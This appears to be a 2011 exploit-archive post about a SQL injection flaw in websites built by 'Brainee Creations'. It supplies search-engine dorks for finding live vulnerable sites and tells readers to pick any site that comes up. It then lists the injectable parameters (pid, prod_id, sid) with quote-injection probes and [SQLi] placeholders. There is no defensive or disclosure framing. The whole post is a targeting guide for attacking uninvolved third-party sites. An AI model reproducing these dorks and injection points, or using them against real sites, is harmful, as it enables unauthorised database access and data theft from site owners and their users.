#(+)Exploit Title: Brainee Creations Database Access vulnerability #(+)Author : ^Xecuti0n3r #(+) Date : 15.04.2011 #(+) Hour : 13:37 PM #(+) E-mail : xecuti0n3r()yahoo.com #(+) dork1 : intext:"Site Designed by Brainee Creations" inurl:product.php? #(+) dork2 : intext:"Site Designed by Brainee Creations" inurl:page.php? #(+) Category : Web Apps [SQli] ____________________________________________________________________ ____________________________________________________________________ Choose any site that comes up when you enter the dork intext:"Site Designed by Brainee Creations" inurl:product.php? in search engine *SQL injection Vulnerability* For DOrk1 : # [+]http://site.com/product.php?pid='08 # [+]http://site.com/product.php?pid=[SQLi] # [+]http://site.com/product.php?prod_id='13 # [+]http://site.com/product.php?prod_id=[SQLi] # [+]http://site.com/product.php?pid='82 # [+]http://site.com/product.php?pid=[SQLi] For Dork2 : # [+]http://site.com/page.php?pid='2 # [+]http://site.com/page.php?pid=[SQLi] # [+]http://site.com/page.php?sid='1&pid='6 # [+]http://site.com/page.php?sid=[SQLi]&pid=[SQLi] Well there are a lot more .. just use the dork filetype:php ;) .. ____________________________________________________________________ ____________________________________________________________________ ######################################################################## (+)Exploit Coded by: ^Xecuti0n3r (+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r ########################################################################